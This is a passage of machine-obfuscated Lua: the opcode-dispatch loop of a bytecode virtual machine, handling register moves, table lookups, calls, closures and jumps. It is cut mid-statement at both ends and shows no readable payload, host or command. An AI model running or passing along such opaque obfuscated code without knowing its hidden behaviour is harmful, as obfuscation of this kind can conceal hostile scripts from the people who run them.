end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;end;elseif i<=305 then if i<=299 then if i<=296 then if i>295 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else if(l[e[3]]~=l[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=297 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>298 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local s={l[i](c(t,1,s-i))};local r,s=s,#s;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=r[a];end;o=s;n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;l[i](c(t,1,s-i));o=i-1;else local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];end;elseif i<=302 then if i<=300 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]]*l[e[4]];elseif i>301 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];else local f=Q[e[3]];local t;if f[5]~=0 then local e={};t=Z({},{__index=function(l,n)local e=e[n];return e[1][e[2]];end,__newindex=function(o,l,n)local e=e[l]e[1][e[2]]=n;end;});for o=1,f[5]do n=n+1;local n=d[n];if n[1]==204 then e[o-1]={l,n[3]};else e[o-1]={K,n[3]};end;r[#r+1]=e;end;end;local e=e[2];if e>o then o=e end;l[e]=A(f,t,Env);end;elseif i<=303 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>304 then local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;else local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;end;elseif i<=311 then if i<=308 then if i<=306 then n=n+e[3];elseif i>307 then do return end;else local t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][l[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];end;elseif i<=309 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>310 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;end;elseif i<=314 then if i<=312 then local o=e[2];local f=l[o+2];local d=l[o]+f;l[o]=d;if f>0 then if d<=l[o+1]then n=n+e[3];l[o+3]=d;end;elseif d>=l[o+1]then n=n+e[3];l[o+3]=d;end;elseif i>313 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];else local i=e[2];l[i]();o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local s={l[i](c(t,1,s-i))};local A,s=s,#s;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;l[i](c(t,1,s-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=315 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>316 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local A={l[i](c(t,1,s-i))};local Z,s=A,#A;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];r=l[e[3]];l[i+1]=r;l[i]=r[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;A={l[i](c(t,1,s-i))};Z,s=A,#A;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=Z[a];end;o=s;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else n=n+e[3];end;elseif i<=340 then if i<=328 then if i<=322 then if i<=319 then if i>318 then local t=e[2];if t>o then o=t end;l[t]={c({},1,e[3])};n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]={c({},1,e[3])};n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]={c({},1,e[3])};n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];n=n+1;e=d[n];do return end;else if(l[e[3]]~=f[e[4]])then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=320 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;local t={l[i](c(t,1,a-i))};local c,t=t,#t;t=i+e[4]-2;h=0;for e=i,t do h=h+1;l[e]=c[h];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]]*l[e[4]];n=n+1;e=d[n];l[e[2]][f[e[3]]]=l[e[4]];elseif i>321 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;else n=n+e[3];end;elseif i<=325 then if i<=323 then local t=e[2];l[t]();o=t-1;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=l[e[3]][f[e[4]]];n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>324 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=s+i-1;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];t={};a=0;s=o;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;else local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=326 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;elseif i>327 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local t={l[i](c(t,1,s-i))};local c,t=t,#t;t=i+e[4]-2;a=0;for e=i,t do a=a+1;l[e]=c[a];end;o=t;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];h()[f[e[3]]]=l[e[2]];else local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=334 then if i<=331 then if i<=329 then l[e[2]][f[e[3]]]=l[e[4]];elseif i>330 then if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else h()[f[e[3]]]=l[e[2]];end;elseif i<=332 then local n;local d=e[2];local t={};local n=0;local f=d+e[3]-1;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;elseif i>333 then local t;local t=e[2];local a={};local i=0;local s=t+e[3]-1;for e=t+1,s do i=i+1;a[i]=l[e];end;l[t](c(a,1,s-t));o=t-1;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=h()[f[e[3]]];n=n+1;e=d[n];t=e[2];local h=l[e[3]];l[t+1]=h;l[t]=h[f[e[4]]];if t+1>o then o=t+1 end;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=(e[3]~=0);n=n+1;e=d[n];t=e[2];a={};i=0;s=t+e[3]-1;for e=t+1,s do i=i+1;a[i]=l[e];end;local s={l[t](c(a,1,s-t))};local r,h=s,#s;h=h+t-1;i=0;for e=t,h do i=i+1;l[e]=r[i];end;o=h;n=n+1;e=d[n];t=e[2];a={};i=0;h=o;for e=t+1,h do i=i+1;a[i]=l[e];end;s={l[t](c(a,1,h-t))};r,h=s,#s;h=t+e[4]-2;i=0;for e=t,h do i=i+1;l[e]=r[i];end;o=h;n=n+1;e=d[n];t=e[2];l[t]();o=t-1;n=n+1;e=d[n];t=e[2];if t>o then o=t end;l[t]=f[e[3]];else local i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local h;i=e[2];t={};local h=0;local a=i+e[3]-1;for e=i+1,a do h=h+1;t[h]=l[e];end;l[i](c(t,1,a-i));o=i-1;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];end;elseif i<=337 then if i<=335 then local n=e[2];if n>o then o=n end;l[n]=h()[f[e[3]]];elseif i>336 then local o=e[2];l[o]=l[o]-l[o+2];n=n+e[3];else local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=338 then local n=e[2];if n>o then o=n end;l[n]={c({},1,e[3])};elseif i>339 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local o=e[2];local f=l[o+2];local d=l[o]+f;l[o]=d;if f>0 then if d<=l[o+1]then n=n+e[3];l[o+3]=d;end;elseif d>=l[o+1]then n=n+e[3];l[o+3]=d;end;end;elseif i<=351 then if i<=345 then if i<=342 then if i>341 then local n=e[2];local d={l[n]()};local f,d=d,#d;d=n+e[4]-2;local e=0;for n=n,d do e=e+1;l[n]=f[e];end;o=d;else do return end;end;elseif i<=343 then local f=Q[e[3]];local t;if f[5]~=0 then local e={};t=Z({},{__index=function(l,n)local e=e[n];return e[1][e[2]];end,__newindex=function(o,n,l)local e=e[n]e[1][e[2]]=l;end;});for o=1,f[5]do n=n+1;local n=d[n];if n[1]==204 then e[o-1]={l,n[3]};else e[o-1]={K,n[3]};end;r[#r+1]=e;end;end;local e=e[2];if e>o then o=e end;l[e]=A(f,t,Env);elseif i>344 then local n;local d=e[2];local f={};local n=0;local e=d+e[3]-1;for e=d+1,e do n=n+1;f[n]=l[e];end;local e={l[d](c(f,1,e-d))};local f,e=e,#e;e=e+d-1;n=0;for e=d,e do n=n+1;l[e]=f[n];end;o=e;else local f=Q[e[3]];local t;if f[5]~=0 then local e={};t=Z({},{__index=function(l,n)local e=e[n];return e[1][e[2]];end,__newindex=function(o,l,n)local e=e[l]e[1][e[2]]=n;end;});for o=1,f[5]do n=n+1;local n=d[n];if n[1]==204 then e[o-1]={l,n[3]};else e[o-1]={K,n[3]};end;r[#r+1]=e;end;end;local e=e[2];if e>o then o=e end;l[e]=A(f,t,Env);end;elseif i<=348 then if i<=346 then local n;local n=e[2];local f={};local d=0;local e=n+e[3]-1;for e=n+1,e do d=d+1;f[d]=l[e];end;l[n](c(f,1,e-n));o=n-1;elseif i>347 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local a=l[e[3]];l[i+1]=a;l[i]=a[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local n;i=e[2];t={};local n=0;local d=i+e[3]-1;for e=i+1,d do n=n+1;t[n]=l[e];end;local d={l[i](c(t,1,d-i))};local f,d=d,#d;d=i+e[4]-2;n=0;for e=i,d do n=n+1;l[e]=f[n];end;o=d;else local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;end;elseif i<=349 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;elseif i>350 then local i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];local h=l[e[3]];l[i+1]=h;l[i]=h[f[e[4]]];if i+1>o then o=i+1 end;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=f[e[3]];n=n+1;e=d[n];local f;i=e[2];t={};local f=0;local h=i+e[3]-1;for e=i+1,h do f=f+1;t[f]=l[e];end;local t={l[i](c(t,1,h-i))};local h,t=t,#t;t=i+e[4]-2;f=0;for e=i,t do f=f+1;l[e]=h[f];end;o=t;n=n+1;e=d[n];if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;else local n;local d=e[2];local f={};local n=0;local t=o;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=357 then if i<=354 then if i<=352 then h()[f[e[3]]]=l[e[2]];elseif i>353 then l[e[2]][f[e[3]]]=l[e[4]];else if l[e[2]]then n=n+1;else n=n+d[n+1][3]+1;end;end;elseif i<=355 then local n=e[2];local d=l[e[3]];l[n+1]=d;l[n]=d[f[e[4]]];if n+1>o then o=n+1 end;elseif i>356 then local n=e[2];if n>o then o=n end;l[n]=f[e[3]];else local n;local d=e[2];local t={};local n=0;local f=o;for e=d+1,f do n=n+1;t[n]=l[e];end;local f={l[d](c(t,1,f-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do n=n+1;l[e]=t[n];end;o=f;end;elseif i<=360 then if i<=358 then local n=e[2];if n>o then o=n end;l[n]=l[e[3]][f[e[4]]];elseif i>359 then local i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];local a;i=e[2];t={};local a=0;local s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;local r={l[i](c(t,1,s-i))};local A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][f[e[4]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=h()[f[e[3]]];n=n+1;e=d[n];i=e[2];if i>o then o=i end;l[i]=l[e[3]][l[e[4]]];n=n+1;e=d[n];i=e[2];t={};a=0;s=i+e[3]-1;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=s+i-1;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;n=n+1;e=d[n];i=e[2];t={};a=0;s=o;for e=i+1,s do a=a+1;t[a]=l[e];end;r={l[i](c(t,1,s-i))};A,s=r,#r;s=i+e[4]-2;a=0;for e=i,s do a=a+1;l[e]=A[a];end;o=s;else local n;local d=e[2];local f={};local n=0;local t=d+e[3]-1;for e=d+1,t do n=n+1;f[n]=l[e];end;local f={l[d](c(f,1,t-d))};local t,f=f,#f;f=d+e[4]-2;n=0;for e=d,f do 